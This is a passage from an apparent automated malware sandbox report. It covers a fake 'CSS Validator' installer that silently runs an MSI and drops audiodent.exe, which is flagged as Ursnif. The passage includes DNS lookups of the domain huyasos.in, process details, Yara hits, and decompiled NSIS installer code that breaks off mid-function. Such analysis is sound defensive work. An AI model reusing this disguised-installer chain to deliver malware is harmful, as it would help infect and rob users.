Oct 25, 2021 17:07:07.969619989 CEST	53	61733	8.8.8.8	192.168.2.5
Oct 25, 2021 17:08:28.162395954 CEST	59596	53	192.168.2.5	8.8.8.8
Oct 25, 2021 17:08:29.209424973 CEST	59596	53	192.168.2.5	8.8.8.8
Oct 25, 2021 17:08:29.319314003 CEST	53	59596	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 25, 2021 17:07:07.918047905 CEST	192.168.2.5	8.8.8.8	0x537b	Standard query (0)	get.updates.avast.cn	A (IP address)	IN (0x0001)
Oct 25, 2021 17:08:28.162395954 CEST	192.168.2.5	8.8.8.8	0x82e5	Standard query (0)	huyasos.in	A (IP address)	IN (0x0001)
Oct 25, 2021 17:08:29.209424973 CEST	192.168.2.5	8.8.8.8	0x82e5	Standard query (0)	huyasos.in	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 25, 2021 17:07:07.969619989 CEST	8.8.8.8	192.168.2.5	0x537b	Name error (3)	get.updates.avast.cn	none	none	A (IP address)	IN (0x0001)
Oct 25, 2021 17:08:29.319314003 CEST	8.8.8.8	192.168.2.5	0x82e5	No error (0)	huyasos.in		185.98.87.196	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: yRqHWQ91dT.exe PID: 5776 Parent PID: 5984

General

Start time:	17:06:28
Start date:	25/10/2021
Path:	C:\Users\user\Desktop\yRqHWQ91dT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\yRqHWQ91dT.exe'
Imagebase:	0x400000
File size:	7580858 bytes
MD5 hash:	B50FFA06ECA2B3A4D92562561FC6B2D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: msiexec.exe PID: 3428 Parent PID: 5776

General

Start time:	17:06:30
Start date:	25/10/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec /i 'C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi' /qn /norestart
Imagebase:	0xdf0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 2952 Parent PID: 556

General

Start time:	17:06:31
Start date:	25/10/2021
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6e40a0000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 640 Parent PID: 2952

General

Start time:	17:06:34
Start date:	25/10/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 7A8FDEF089EF820D04B2E0639E42DA17
Imagebase:	0xdf0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: audiodent.exe PID: 5656 Parent PID: 2952

General

Start time:	17:06:41
Start date:	25/10/2021
Path:	C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe
Imagebase:	0x980000
File size:	10532352 bytes
MD5 hash:	A0052D6EAC0D6D4296DE89213447416D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.462453858.0000000008A28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.462430424.0000000008A28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000002.524066037.0000000008A28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.462394649.0000000008A28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.462483110.0000000008A28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000002.524018514.00000000083B9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.462302321.0000000008A28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.462367584.0000000008A28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.462337552.0000000008A28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.462470017.0000000008A28000.00000004.00000040.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: yRqHWQ91dT.exe PID: 5776 Parent PID: 5984 yRqHWQ91dT.exeCOMMON

Executed Functions

Function 00403348, Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t62;
				int _t65;
				signed int _t66;
				int _t67;
				signed int _t69;
				void* _t93;
				signed int _t109;
				void* _t112;
				void* _t117;
				intOrPtr* _t118;
				char _t121;
				signed int _t140;
				signed int _t141;
				int _t149;
				void* _t150;
				intOrPtr* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t158;
				char* _t159;
				void* _t162;
				void* _t163;
				char _t188;

				 *(_t163 + 0x18) = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t163 + 0x20) = 0;
				 *(_t163 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f42c = _t42;
				if(_t42 != 6) {
					_t118 = E00406500(0);
					if(_t118 != 0) {
						 *_t118(0xc00);
					}
				}
				_t155 = "UXTHEME";
				do {
					E00406492(_t155); // executed
					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
				} while ( *_t155 != 0);
				E00406500(0xb);
				 *0x42f424 = E00406500(9);
				_t47 = E00406500(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f42f =  *0x42f42f | 0x00000040;
					}
				}
				__imp__#17(_t158);
				__imp__OleInitialize(0); // executed
				 *0x42f4f8 = _t47;
				SHGetFileInfoA(0x429850, 0, _t163 + 0x38, 0x160, 0); // executed
				E004060F7("Name Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t159 = "\"C:\\Users\\alfons\\Desktop\\yRqHWQ91dT.exe\" ";
				E004060F7(_t159, _t51);
				 *0x42f420 = 0x400000;
				_t53 = _t159;
				if("\"C:\\Users\\alfons\\Desktop\\yRqHWQ91dT.exe\" " == 0x22) {
					 *(_t163 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405ABA(_t53,  *(_t163 + 0x14)));
				 *(_t163 + 0x1c) = _t55;
				while(1) {
					_t121 =  *_t55;
					_t171 = _t121;
					if(_t121 == 0) {
						break;
					}
					__eflags = _t121 - 0x20;
					if(_t121 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t163 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t163 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405ABA(_t55,  *(_t163 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp",  &(_t55[2]));
										L30:
										_t156 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t156);
										_t59 = E00403317(_t171);
										_t172 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t174,  *(_t163 + 0x20)); // executed
											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t184 =  *((intOrPtr*)(_t163 + 0x10));
												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
													__eflags =  *0x42f4d4;
													if( *0x42f4d4 == 0) {
														L67:
														_t62 =  *0x42f4ec;
														__eflags = _t62 - 0xffffffff;
														if(_t62 != 0xffffffff) {
															 *(_t163 + 0x14) = _t62;
														}
														ExitProcess( *(_t163 + 0x14));
													}
													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
													__eflags = _t65;
													_t149 = 2;
													if(_t65 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
														 *(_t163 + 0x38) = 1;
														 *(_t163 + 0x44) = _t149;
														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
													}
													_t66 = E00406500(4);
													__eflags = _t66;
													if(_t66 == 0) {
														L65:
														_t67 = ExitWindowsEx(_t149, 0x80040002);
														__eflags = _t67;
														if(_t67 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t69;
														if(_t69 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405813( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f440 == 0) {
												L42:
												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
												 *(_t163 + 0x18) = E0040390A( *0x42f4ec);
												goto L43;
											}
											_t152 = E00405ABA(_t159, 0);
											if(_t152 < _t159) {
												L39:
												_t181 = _t152 - _t159;
												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
												if(_t152 < _t159) {
													_t150 = E0040577E(_t184);
													lstrcatA(_t156, "~nsu");
													if(_t150 != 0) {
														lstrcatA(_t156, "A");
													}
													lstrcatA(_t156, ".tmp");
													_t161 = "C:\\Users\\alfons\\Desktop";
													if(lstrcmpiA(_t156, "C:\\Users\\alfons\\Desktop") != 0) {
														_push(_t156);
														if(_t150 == 0) {
															E00405761();
														} else {
															E004056E4();
														}
														SetCurrentDirectoryA(_t156);
														_t188 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp"; // 0x43
														if(_t188 == 0) {
															E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp", _t161);
														}
														E004060F7(0x430000,  *(_t163 + 0x1c));
														_t136 = "A";
														_t162 = 0x1a;
														 *0x430400 = "A";
														do {
															E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
															DeleteFileA(0x429450);
															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\yRqHWQ91dT.exe", 0x429450, 1) != 0) {
																E00405ED6(_t136, 0x429450, 0);
																E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
																_t93 = E00405796(0x429450);
																if(_t93 != 0) {
																	CloseHandle(_t93);
																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t162 = _t162 - 1;
														} while (_t162 != 0);
														E00405ED6(_t136, _t156, 0);
													}
													goto L43;
												}
												 *_t152 = 0;
												_t153 = _t152 + 4;
												if(E00405B7D(_t181, _t152 + 4) == 0) {
													goto L43;
												}
												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp", _t153);
												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp", _t153);
												 *((intOrPtr*)(_t163 + 0x10)) = 0;
												goto L42;
											}
											_t109 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t152 != _t109) {
												_t152 = _t152 - 1;
												if(_t152 >= _t159) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t156, 0x3fb);
										lstrcatA(_t156, "\\Temp");
										_t112 = E00403317(_t172);
										_t173 = _t112;
										if(_t112 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t156);
										lstrcatA(_t156, "Low");
										SetEnvironmentVariableA("TEMP", _t156);
										SetEnvironmentVariableA("TMP", _t156);
										_t117 = E00403317(_t173);
										_t174 = _t117;
										if(_t117 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t140 = _t55[4];
								__eflags = _t140 - 0x20;
								if(_t140 == 0x20) {
									L23:
									_t15 = _t163 + 0x20;
									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t140;
								if(_t140 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t141 = _t55[1];
							__eflags = _t141 - 0x20;
							if(_t141 == 0x20) {
								L19:
								 *0x42f4e0 = 1;
								goto L20;
							}
							__eflags = _t141;
							if(_t141 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403358
0x0040335c
0x00403364
0x00403368
0x0040336d
0x00403379
0x00403382
0x00403387
0x0040338a
0x00403391
0x00403398
0x00403398
0x00403391
0x0040339a
0x0040339f
0x004033a0
0x004033ac
0x004033b0
0x004033b6
0x004033c4
0x004033c9
0x004033d0
0x004033d4
0x004033d8
0x004033da
0x004033da
0x004033d8
0x004033e2
0x004033e9
0x004033ef
0x00403405
0x00403415
0x0040341a
0x00403420
0x00403427
0x00403433
0x0040343d
0x0040343f
0x00403441
0x00403446
0x00403446
0x00403456
0x0040345c
0x00403525
0x00403525
0x00403527
0x00403529
0x00000000
0x00000000
0x00403465
0x00403468
0x00403470
0x00403470
0x00403473
0x00403478
0x0040347a
0x0040347a
0x0040347b
0x0040347b
0x00403480
0x00403483
0x00403515
0x0040351a
0x0040351f
0x00403522
0x00403524
0x00403524
0x00403524
0x00000000
0x00403489
0x00403489
0x0040348a
0x0040348d
0x004034a5
0x004034d0
0x004034d2
0x004034e5
0x00403510
0x00403513
0x00403531
0x00403534
0x0040353d
0x00403542
0x00403548
0x00403553
0x00403555
0x0040355a
0x0040355c
0x004035b4
0x004035b9
0x004035c3
0x004035ca
0x004035ce
0x00403662
0x00403662
0x00403667
0x0040366d
0x00403672
0x00403796
0x0040379c
0x00403818
0x00403818
0x0040381d
0x00403820
0x00403822
0x00403822
0x0040382a
0x0040382a
0x004037ac
0x004037b4
0x004037b6
0x004037b7
0x004037c4
0x004037d7
0x004037df
0x004037e3
0x004037e3
0x004037eb
0x004037f0
0x004037f7
0x00403805
0x00403807
0x0040380d
0x0040380f
0x00000000
0x00000000
0x00000000
0x004037f9
0x004037ff
0x00403801
0x00403803
0x00403811
0x00403813
0x00000000
0x00403813
0x00000000
0x00403803
0x004037f7
0x00403681
0x00403688
0x00403688
0x004035da
0x00403652
0x00403652
0x0040365e
0x00000000
0x0040365e
0x004035e3
0x004035e7
0x0040361d
0x0040361d
0x0040361f
0x00403627
0x00403699
0x0040369b
0x004036a2
0x004036aa
0x004036aa
0x004036b5
0x004036ba
0x004036c9
0x004036cd
0x004036ce
0x004036d7
0x004036d0
0x004036d0
0x004036d0
0x004036dd
0x004036e3
0x004036e9
0x004036f1
0x004036f1
0x004036ff
0x00403704
0x00403716
0x0040371e
0x00403724
0x00403730
0x00403736
0x00403740
0x00403756
0x00403767
0x0040376d
0x00403774
0x00403777
0x0040377d
0x0040377d
0x00403774
0x00403781
0x00403787
0x00403787
0x0040378c
0x0040378c
0x00000000
0x004036c9
0x00403629
0x0040362b
0x00403636
0x00000000
0x00000000
0x0040363e
0x00403649
0x0040364e
0x00000000
0x0040364e
0x00403612
0x00403614
0x00403618
0x0040361b
0x00000000
0x00000000
0x00000000
0x0040361b
0x00000000
0x00403614
0x00403564
0x00403570
0x00403575
0x0040357a
0x0040357c
0x00000000
0x00000000
0x00403584
0x0040358c
0x0040359d
0x004035a5
0x004035a7
0x004035ac
0x004035ae
0x00000000
0x00000000
0x00000000
0x004035ae
0x00000000
0x00403513
0x004034d4
0x004034d7
0x004034da
0x004034e0
0x004034e0
0x004034e0
0x004034e0
0x00000000
0x004034e0
0x004034dc
0x004034de
0x00000000
0x00000000
0x00000000
0x004034de
0x0040348f
0x00403492
0x00403495
0x0040349b
0x0040349b
0x00000000
0x0040349b
0x00403497
0x00403499
0x00000000
0x00000000
0x00000000
0x00403499
0x00000000
0x00000000
0x00000000
0x0040346a
0x0040346a
0x0040346a
0x0040346b
0x0040346b
0x00000000
0x0040346a
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 0040336D
GetVersion.KERNEL32 ref: 00403373
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
OleInitialize.OLE32(00000000), ref: 004033E9
SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
GetCommandLineA.KERNEL32(Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\yRqHWQ91dT.exe" ,00000020,"C:\Users\user\Desktop\yRqHWQ91dT.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 0040390A: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000,00000002,7519FA90), ref: 004039FA
Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000), ref: 00403A0D
Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(: Completed), ref: 00403A18
Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E

ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 00403662

Part of subcall function 00403830: CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
ExitProcess.KERNEL32 ref: 00403688
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
ExitWindowsEx.USER32 ref: 00403807
ExitProcess.KERNEL32 ref: 0040382A

Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E

Strings

Error launching installer, xrefs: 0040361F
Name Setup, xrefs: 00403410
.tmp, xrefs: 004036AF
"C:\Users\user\Desktop\yRqHWQ91dT.exe" , xrefs: 00403420, 00403426, 004035DD
", xrefs: 0040347B
TEMP, xrefs: 00403598
TMP, xrefs: 004035A0
Low, xrefs: 00403586
\Temp, xrefs: 0040356A
C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp, xrefs: 00403644
SeShutdownPrivilege, xrefs: 004037BE
NSIS Error, xrefs: 0040340B
UXTHEME, xrefs: 0040339A, 0040339F, 004033A5
1033, xrefs: 004035B4
C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp, xrefs: 00403538, 00403639, 004036E3, 004036EC
~nsu, xrefs: 00403693
C:\Users\user\Desktop, xrefs: 004036BA, 004036BF, 004036EB
C:\Users\user\Desktop\yRqHWQ91dT.exe, xrefs: 00403745
C:\Users\user\AppData\Local\Temp\, xrefs: 00403548, 0040354D, 00403563, 0040356F, 0040357E, 0040358B, 00403597, 0040359F, 00403698, 004036A9, 004036B4, 004036C0, 004036CD, 004036DC, 0040378B

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\yRqHWQ91dT.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp$C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp$C:\Users\user\Desktop$C:\Users\user\Desktop\yRqHWQ91dT.exe$Error launching installer$Low$NSIS Error$Name Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 562314493-831845884
Opcode ID: 1a1b288cbf3b99bbb78fe56771ce3031141c06f1a248a696f65f65e1505ce84f
Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
Opcode Fuzzy Hash: 1a1b288cbf3b99bbb78fe56771ce3031141c06f1a248a696f65f65e1505ce84f
Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040535C, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x30334
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						FindCloseChangeNotification(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a890;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8); // executed
							__eflags =  *0x42f4cc - _t150;
							if( *0x42f4cc == _t150) {
								_t113 =  *0x42a068; // 0x60b0e4
								E0040521E( *((intOrPtr*)(_t113 + 0x34)), _t150);
							}
							E00404154(1);
							goto L25;
						}
						 *0x429c60 = 2;
						E00404154(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041E2(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E004041B0(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f434;
